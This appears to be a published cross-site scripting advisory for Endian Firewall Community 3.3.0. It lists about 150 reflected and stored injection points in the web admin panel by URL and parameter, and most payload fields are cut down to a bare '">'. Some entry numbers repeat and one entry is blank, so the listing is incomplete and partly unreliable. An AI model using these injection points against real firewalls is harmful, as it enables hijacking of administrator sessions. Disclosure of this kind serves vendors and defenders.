##################################################################################################################################
# Exploit Title: Endian Firewall Community release 3.3.0 | Cross-Site
Scripting
# Date: 24.01.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://www.endian.com
# Software Link:
https://sourceforge.net/projects/efw/files/Development/EFW-3.3.0/
# Version: 3.3.0
##################################################################################################################################
Introduction
Endian Firewall Community (EFW) is a turn-key Linux based security software
product designed for home that can transform any unused hardware appliance
into a full-featured Unified Threat Management (UTM) solution. Endian
Community is designed to make security simple and help protect home
networks by using the power of Open Source.
#################################################################################
XSS details: Reflected & Stored
#################################################################################
XSS1 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi
METHOD
Post
PARAMETER
DISPLAY_GREEN_ADDRESS
PAYLOAD
#################################################################################
XSS2 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi
METHOD
Post
PARAMETER
DISPLAY_GREEN_NETMASK
PAYLOAD
#################################################################################
XSS3 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi
METHOD
Post
PARAMETER
DISPLAY_GREEN_ADDITIONAL
PAYLOAD
#################################################################################
XSS4 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi
METHOD
Post
PARAMETER
MTU
PAYLOAD
#################################################################################
XSS5 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi
METHOD
Post
PARAMETER
MAC
PAYLOAD
#################################################################################
XSS6 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi
METHOD
Post
PARAMETER
MAIN_ADMINMAIL
PAYLOAD
#################################################################################
XSS7 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi
METHOD
Post
PARAMETER
MAIN_MAILFROM
PAYLOAD
#################################################################################
XSS8 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi
METHOD
Post
PARAMETER
MAIN_SMARTHOST
PAYLOAD
#################################################################################
XSS9 | Stored
URL
https://192.168.2.200:10443/manage/notifications/
METHOD
Post
PARAMETER
SMARTHOST_ADDRESS
PAYLOAD
">
#################################################################################
XSS10 | Stored
URL
https://192.168.2.200:10443/manage/notifications/
METHOD
Post
PARAMETER
SMARTHOST_USERNAME
PAYLOAD
">
#################################################################################
XSS11 | Stored
URL
https://192.168.2.200:10443/manage/password/web/?ACTION=edit&CONTROLLERNAME=&ID=2
METHOD
Post
PARAMETER
remark
PAYLOAD
">
#################################################################################
XSS12 | Reflected
URL
https://192.168.2.200:10443/manage/gui/
METHOD
Post
PARAMETER
new_cert_name
PAYLOAD
">
#################################################################################
XSS13 | Reflected
URL
https://192.168.2.200:10443/manage/gui/
METHOD
Post
PARAMETER
new_cert_email
PAYLOAD
">
#################################################################################
XSS14 | Reflected
URL
https://192.168.2.200:10443/manage/gui/
METHOD
Post
PARAMETER
new_cert_ou
PAYLOAD
">
#################################################################################
XSS15 | Reflected
URL
https://192.168.2.200:10443/manage/gui/
METHOD
Post
PARAMETER
new_cert_city
PAYLOAD
">
#################################################################################
XSS16 | Reflected
URL
https://192.168.2.200:10443/manage/gui/
METHOD
Post
PARAMETER
new_cert_state
PAYLOAD
">
#################################################################################
XSS17 | Reflected
URL
https://192.168.2.200:10443/manage/gui/
METHOD
Post
PARAMETER
new_cert_days
PAYLOAD
">
#################################################################################
XSS18 | Reflected
URL
https://192.168.2.200:10443/manage/gui/
METHOD
Post
PARAMETER
upload_cert_req_days
PAYLOAD
">
#################################################################################
XSS19 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/backupschedule.cgi
METHOD
Post
PARAMETER
BACKUP_RCPTTO
PAYLOAD
">
#################################################################################
XSS20 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/backupschedule.cgi
METHOD
Post
PARAMETER
BACKUP_MAILFROM
PAYLOAD
">
#################################################################################
XSS21 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/backupschedule.cgi
METHOD
Post
PARAMETER
BACKUP_SMARTHOST
PAYLOAD
">
#################################################################################
XSS22 | Stored
URL
https://192.168.2.200:10443/manage/dnsmasq/hosts/?ACTION=edit&CONTROLLERNAME=hosts&ID=1
METHOD
Post
PARAMETER
remark
PAYLOAD
">
#################################################################################
XSS23 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/routing.cgi
METHOD
Post
PARAMETER
source
PAYLOAD
">
#################################################################################
XSS24 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/routing.cgi
METHOD
Post
PARAMETER
destination
PAYLOAD
">
#################################################################################
XSS25 | Reflected
URL
METHOD
PARAMETER
PAYLOAD
">
#################################################################################
XSS26 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/policy_routing.cgi
METHOD
Post
PARAMETER
source
PAYLOAD
">
#################################################################################
XSS27 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/policy_routing.cgi
METHOD
Post
PARAMETER
destination
PAYLOAD
">
#################################################################################
XSS28 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/policy_routing.cgi
METHOD
Post
PARAMETER
port
PAYLOAD
">
#################################################################################
XSS29 | Stored
URL
https://192.168.2.200:10443/cgi-bin/uplinkeditor.cgi
METHOD
Post
PARAMETER
NAME
PAYLOAD
">
#################################################################################
XSS30 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/vlanconfig.cgi
METHOD
Post
PARAMETER
DEVICE
PAYLOAD
">
#################################################################################
XSS31 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
DEFAULT_LEASE_TIME_GREEN
PAYLOAD
">
#################################################################################
XSS32 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
MAX_LEASE_TIME_GREEN
PAYLOAD
">
#################################################################################
XSS33 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
DOMAIN_NAME_GREEN
PAYLOAD
">
#################################################################################
XSS34 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
DEFAULT_LEASE_TIME_ORANGE
PAYLOAD
">
#################################################################################
XSS35 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
MAX_LEASE_TIME_ORANGE
PAYLOAD
">
#################################################################################
XSS36 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
DOMAIN_NAME_ORANGE
PAYLOAD
">
#################################################################################
XSS37 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
DEFAULT_LEASE_TIME_BLUE
PAYLOAD
">
#################################################################################
XSS38 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
MAX_LEASE_TIME_BLUE
PAYLOAD
">
#################################################################################
XSS39 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
DOMAIN_NAME_BLUE
PAYLOAD
">
#################################################################################
XSS40 | Reflected
URL
https://192.168.2.200:10443/manage/dhcp/fixed_leases/
METHOD
Post
PARAMETER
remark
PAYLOAD
">
#################################################################################
XSS41 | Reflected
URL
https://192.168.2.200:10443/manage/dhcp/fixed_leases/
METHOD
Post
PARAMETER
filename
PAYLOAD
">
#################################################################################
XSS42 | Reflected
URL
https://192.168.2.200:10443/manage/dhcp/fixed_leases/
METHOD
Post
PARAMETER
root_path
PAYLOAD
">
#################################################################################
XSS43 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/time.cgi
METHOD
Post
PARAMETER
NTP_SERVER_LIST
PAYLOAD
">
#################################################################################
XSS44 | Stored
URL
https://192.168.2.200:10443/cgi-bin/salearn.cgi
METHOD
Post
PARAMETER
remark
PAYLOAD
">
#################################################################################
XSS45 | Stored
URL
https://192.168.2.200:10443/cgi-bin/salearn.cgi
METHOD
Post
PARAMETER
host
PAYLOAD
">
#################################################################################
XSS46 | Stored
URL
https://192.168.2.200:10443/cgi-bin/salearn.cgi
METHOD
Post
PARAMETER
user
PAYLOAD
">
#################################################################################
XSS3 | Stored
URL
https://192.168.2.200:10443/cgi-bin/salearn.cgi
METHOD
Post
PARAMETER
ham
PAYLOAD
">
#################################################################################
XSS48 | Stored
URL
https://192.168.2.200:10443/cgi-bin/salearn.cgi
METHOD
Post
PARAMETER
spam
PAYLOAD
">
#################################################################################
XSS49 | Reflected
URL
https://192.168.2.200:10443/manage/qos/devices/
METHOD
Post
PARAMETER
device
PAYLOAD
">
#################################################################################
XSS50 | Reflected
URL
https://192.168.2.200:10443/manage/qos/classes/
METHOD
Post
PARAMETER
name
PAYLOAD
">
#################################################################################
XSS51 | Reflected
URL
https://192.168.2.200:10443/manage/qos/rules/
METHOD
Post
PARAMETER
protocol
PAYLOAD
">
#################################################################################
XSS52 | Reflected
URL
https://192.168.2.200:10443/manage/qos/rules/
METHOD
Post
PARAMETER
dscp
PAYLOAD
">
#################################################################################
XSS53 | Reflected
URL
https://192.168.2.200:10443/manage/qos/rules/
METHOD
Post
PARAMETER
comment
PAYLOAD
">
#################################################################################
XSS54 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/dnat.cgi
METHOD
Post
PARAMETER
target_ip_ip
PAYLOAD
">
#################################################################################
XSS55 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/snat.cgi
METHOD
Post
PARAMETER
source
PAYLOAD
">
#################################################################################
XSS56 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/snat.cgi
METHOD
Post
PARAMETER
snat_to_ip
PAYLOAD
">
#################################################################################
XSS57 | Stored
URL
https://192.168.2.200:10443/cgi-bin/incoming.cgi
METHOD
Post
PARAMETER
destination
PAYLOAD
">
#################################################################################
XSS58 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/incoming.cgi
METHOD
Post
PARAMETER
target
PAYLOAD
">
#################################################################################
XSS59 | Stored
URL
https://192.168.2.200:10443/cgi-bin/incoming.cgi
METHOD
Post
PARAMETER
remark
PAYLOAD
">
#################################################################################
XSS60 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/outgoingfw.cgi
METHOD
Post
PARAMETER
target
PAYLOAD
">
#################################################################################
XSS61 | Stored
URL
https://192.168.2.200:10443/cgi-bin/outgoingfw.cgi
METHOD
Post
PARAMETER
remark
PAYLOAD
">
#################################################################################
XSS62 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/zonefw.cgi
METHOD
Post
PARAMETER
target
PAYLOAD
">
#################################################################################
XSS63 | Stored
URL
https://192.168.2.200:10443/cgi-bin/zonefw.cgi
METHOD
Post
PARAMETER
remark
PAYLOAD
">
#################################################################################
XSS64 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/vpnfw.cgi
METHOD
Post
PARAMETER
source
PAYLOAD
">
#################################################################################
XSS65 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/vpnfw.cgi
METHOD
Post
PARAMETER
target
PAYLOAD
">
#################################################################################
XSS66 | Stored
URL
https://192.168.2.200:10443/cgi-bin/vpnfw.cgi
METHOD
Post
PARAMETER
remark
PAYLOAD
">
#################################################################################
XSS67 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/xtaccess.cgi
METHOD
Post
PARAMETER
target
PAYLOAD
">
#################################################################################
XSS68 | Stored
URL
https://192.168.2.200:10443/cgi-bin/xtaccess.cgi
METHOD
Post
PARAMETER
remark
PAYLOAD
">
#################################################################################
XSS69 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
PROXY_PORT
PAYLOAD
">
#################################################################################
XSS70 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
VISIBLE_HOSTNAME
PAYLOAD
">
#################################################################################
XSS71 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
ADMIN_MAIL_ADDRESS
PAYLOAD
">
#################################################################################
XSS72 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
BYPASS_SOURCE
PAYLOAD
">
#################################################################################
XSS73 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
BYPASS_DESTINATION
PAYLOAD
">
#################################################################################
XSS74 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
CACHE_SIZE
PAYLOAD
">
#################################################################################
XSS75 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
CACHE_MEM
PAYLOAD
">
#################################################################################
XSS76 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
MAX_SIZE
PAYLOAD
">
#################################################################################
XSS77 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
DST_NOCACHE
PAYLOAD
">
#################################################################################
XSS78 | Stored
URL
https://192.168.2.200:10443/cgi-bin/proxypolicy.cgi
METHOD
Post
PARAMETER
filtertype
PAYLOAD
">
#################################################################################
XSS79 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyauth.cgi
METHOD
Post
PARAMETER
AUTH_CHILDREN
PAYLOAD
">
#################################################################################
XSS80 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyauth.cgi
METHOD
Post
PARAMETER
AUTH_MAX_USERIP
PAYLOAD
">
#################################################################################
XSS81 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyauth.cgi
METHOD
Post
PARAMETER
AUTH_CACHE_TTL
PAYLOAD
">
#################################################################################
XSS82 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyauth.cgi
METHOD
Post
PARAMETER
AUTH_IPCACHE_TTL
PAYLOAD
">
#################################################################################
XSS83 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyauth.cgi
METHOD
Post
PARAMETER
NCSA_MIN_PASS_LEN
PAYLOAD
">
#################################################################################
XSS84 | Reflected
URL
https://192.168.2.200:10443/manage/proxy/adjoin/
METHOD
Post
PARAMETER
ADMIN_USER
PAYLOAD
">
#################################################################################
XSS85 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/frox.cgi
METHOD
Post
PARAMETER
TRANSPARENT_SOURCE_BYPASS
PAYLOAD
">
#################################################################################
XSS86 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/frox.cgi
METHOD
Post
PARAMETER
TRANSPARENT_DESTINATION_BYPASS
PAYLOAD
">
#################################################################################
XSS87 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtpconfig.cgi
METHOD
Post
PARAMETER
VIRUS_ADMIN
PAYLOAD
">
#################################################################################
XSS88 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtpconfig.cgi
METHOD
Post
PARAMETER
NOTIFICATION_SENDER
PAYLOAD
">
#################################################################################
XSS89 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtpconfig.cgi
METHOD
Post
PARAMETER
BYPASS_SOURCE
PAYLOAD
">
#################################################################################
XSS90 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtpconfig.cgi
METHOD
Post
PARAMETER
BYPASS_DESTINATION
PAYLOAD
">
#################################################################################
XSS91 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
SENDER_WHITELIST
PAYLOAD
">
#################################################################################
XSS92 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
RECIPIENT_WHITELIST
PAYLOAD
">
#################################################################################
XSS93 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
CLIENT_WHITELIST
PAYLOAD
">
#################################################################################
XSS94 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
SENDER_BLACKLIST
PAYLOAD
">
#################################################################################
XSS95 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
RECIPIENT_BLACKLIST
PAYLOAD
">
#################################################################################
XSS96 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
CLIENT_BLACKLIST
PAYLOAD
">
#################################################################################
XSS97 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
WHITELIST_RECIPIENT
PAYLOAD
">
#################################################################################
XSS98 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
WHITELIST_CLIENT
PAYLOAD
">
#################################################################################
XSS99 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
SPAM_WHITELIST
PAYLOAD
">
#################################################################################
XSS100 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
SPAM_BLACKLIST
PAYLOAD
">
#################################################################################
XSS101 | Stored
URL
https://192.168.2.200:10443/cgi-bin/smtpdomains.cgi
METHOD
Post
PARAMETER
DOMAIN
PAYLOAD
">
#################################################################################
XSS102 | Stored
URL
https://192.168.2.200:10443/cgi-bin/smtpdomains.cgi
METHOD
Post
PARAMETER
SERVER
PAYLOAD
">
#################################################################################
XSS103 | Reflected
URL
https://192.168.2.200:10443/manage/smtpscan/domainrouting/
METHOD
Post
PARAMETER
domain
PAYLOAD
">
#################################################################################
XSS104 | Reflected
URL
https://192.168.2.200:10443/manage/smtpscan/domainrouting/
METHOD
Post
PARAMETER
smarthost_address
PAYLOAD
">
#################################################################################
XSS105 | Reflected
URL
https://192.168.2.200:10443/manage/smtpscan/domainrouting/
METHOD
Post
PARAMETER
smarthost_username
PAYLOAD
">
#################################################################################
XSS106 | Stored
URL
https://192.168.2.200:10443/cgi-bin/smtprouting.cgi
METHOD
Post
PARAMETER
ADDRESS
PAYLOAD
">
#################################################################################
XSS107 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtprouting.cgi
METHOD
Post
PARAMETER
BCC
PAYLOAD
">
#################################################################################
XSS108 | Reflected
URL
https://192.168.2.200:10443/manage/smtpscan/advanced/
METHOD
Post
PARAMETER
SMARTHOST_USERNAME
PAYLOAD
">
#################################################################################
XSS109 | Reflected
URL
https://192.168.2.200:10443/manage/smtpscan/advanced/
METHOD
Post
PARAMETER
AUTH_DAEMONS
PAYLOAD
">
#################################################################################
XSS110 | Stored
URL
https://192.168.2.200:10443/manage/smtpscan/advanced/
METHOD
Post
PARAMETER
IMAP_AUTH_SERVER
PAYLOAD
#################################################################################
XSS111 | Reflected
URL
https://192.168.2.200:10443/manage/smtpscan/advanced/
METHOD
Post
PARAMETER
SMTP_HELO_NAME
PAYLOAD
">
#################################################################################
XSS112 | Stored
URL
https://192.168.2.200:10443/manage/smtpscan/advanced/
METHOD
Post
PARAMETER
ALWAYS_BCC_ADDRESS
PAYLOAD
">
#################################################################################
XSS113 | Reflected
URL
https://192.168.2.200:10443/manage/smtpscan/advanced/
METHOD
Post
PARAMETER
MAILTEMPLATE_LANGUAGE
PAYLOAD
">
#################################################################################
XSS114 | Reflected
URL
https://192.168.2.200:10443/manage/smtpscan/advanced/
METHOD
Post
PARAMETER
SMTPD_HARD_ERROR_LIMIT
PAYLOAD
">
#################################################################################
XSS115 | Reflected
URL
https://192.168.2.200:10443/manage/dnsmasq/localdomains/
METHOD
Post
PARAMETER
remark
PAYLOAD
">
#################################################################################
XSS116 | Reflected
URL
https://192.168.2.200:10443/manage/openvpn/
METHOD
Post
PARAMETER
reneg_sec
PAYLOAD
">
#################################################################################
XSS55 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
remark
PAYLOAD
">
#################################################################################
XSS118 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
secret
PAYLOAD
">
#################################################################################
XSS119 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
new_cert_name
PAYLOAD
">
#################################################################################
XSS120 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
new_cert_email
PAYLOAD
">
#################################################################################
XSS121 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
new_cert_ou
PAYLOAD
">
#################################################################################
XSS122 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
new_cert_organization
PAYLOAD
">
#################################################################################
XSS123 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
new_cert_city
PAYLOAD
">
#################################################################################
XSS124 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
new_cert_state
PAYLOAD
">
#################################################################################
XSS125 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
new_cert_days
PAYLOAD
">
#################################################################################
XSS126 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
upload_cert_req_days
PAYLOAD
">
#################################################################################
XSS127 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
local_peerid
PAYLOAD
">
#################################################################################
XSS128 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
remote_peerid
PAYLOAD
">
#################################################################################
XSS129 | Reflected
URL
https://192.168.2.200:10443/manage/vpnauthentication/user/
METHOD
Post
PARAMETER
name
PAYLOAD
">
#################################################################################
XSS130 | Reflected
URL
https://192.168.2.200:10443/manage/vpnauthentication/user/
METHOD
Post
PARAMETER
remark
PAYLOAD
">
#################################################################################
XSS131 | Reflected
URL
https://192.168.2.200:10443/manage/vpnauthentication/user/
METHOD
Post
PARAMETER
new_cert_days
PAYLOAD
">
#################################################################################
XSS132 | Reflected
URL
https://192.168.2.200:10443/manage/vpnauthentication/user/
METHOD
Post
PARAMETER
upload_cert_req_days
PAYLOAD
">
#################################################################################
XSS133 | Reflected
URL
https://192.168.2.200:10443/manage/vpnauthentication/user/
METHOD
Post
PARAMETER
user_department
PAYLOAD
">
#################################################################################
XSS134 | Reflected
URL
https://192.168.2.200:10443/manage/vpnauthentication/user/
METHOD
Post
PARAMETER
user_organization
PAYLOAD
">
#################################################################################
XSS135 | Reflected
URL
https://192.168.2.200:10443/manage/vpnauthentication/user/
METHOD
Post
PARAMETER
user_city
PAYLOAD
">
#################################################################################
XSS136 | Reflected
URL
https://192.168.2.200:10443/manage/vpnauthentication/user/
METHOD
Post
PARAMETER
user_state
PAYLOAD
">
#################################################################################
XSS137 | Reflected
URL
https://192.168.2.200:10443/manage/ca/certificate/
METHOD
Post
PARAMETER
new_cert_name
PAYLOAD
">
#################################################################################
XSS138 | Reflected
URL
https://192.168.2.200:10443/manage/ca/certificate/
METHOD
Post
PARAMETER
new_cert_ou
PAYLOAD
">
#################################################################################
XSS139 | Reflected
URL
https://192.168.2.200:10443/manage/ca/certificate/
METHOD
Post
PARAMETER
new_cert_organization
PAYLOAD
">
#################################################################################
XSS140 | Reflected
URL
https://192.168.2.200:10443/manage/ca/certificate/
METHOD
Post
PARAMETER
new_cert_city
PAYLOAD
">
#################################################################################
XSS141 | Reflected
URL
https://192.168.2.200:10443/manage/ca/certificate/
METHOD
Post
PARAMETER
new_cert_state
PAYLOAD
">
#################################################################################
XSS142 | Reflected
URL
https://192.168.2.200:10443/manage/ca/certificate/
METHOD
Post
PARAMETER
upload_cert_req_days
PAYLOAD
">
#################################################################################
XSS143 | Stored
URL
https://192.168.2.200:10443/cgi-bin/logs_log.cgi
METHOD
Post
PARAMETER
DATE
PAYLOAD
">
#################################################################################
XSS144 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/logs_log.cgi
METHOD
Post
PARAMETER
OFFSET
PAYLOAD
">
#################################################################################
XSS145 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/logs_ids.cgi
METHOD
Post
PARAMETER
DATE
PAYLOAD
">
#################################################################################
XSS146 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/logs_openvpn.cgi
METHOD
Post
PARAMETER
DATE
PAYLOAD
">
#################################################################################
XSS147 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/logs_clamav.cgi
METHOD
Post
PARAMETER
DATE
PAYLOAD
">
#################################################################################
XSS148 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/logs_firewall.cgi
METHOD
Post
PARAMETER
DATE
PAYLOAD
">
#################################################################################
XSS149 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/logs_firewall.cgi
METHOD
Post
PARAMETER
OFFSET
PAYLOAD
">
#################################################################################
XSS149 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/logs_proxy.cgi
METHOD
Post
PARAMETER
DATE
PAYLOAD
">
#################################################################################
XSS150 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/logs_smtp.cgi
METHOD
Post
PARAMETER
DATE
PAYLOAD
">
#################################################################################
XSS151 | Stored
URL
https://192.168.2.200:10443/manage/opentsa/
METHOD
Post
PARAMETER
HTTP_USERNAME
PAYLOAD
">
#################################################################################
XSS152 | Stored
URL
https://192.168.2.200:10443/manage/opentsa/
METHOD
Post
PARAMETER
HTTP_PASSWORD
PAYLOAD
">
#################################################################################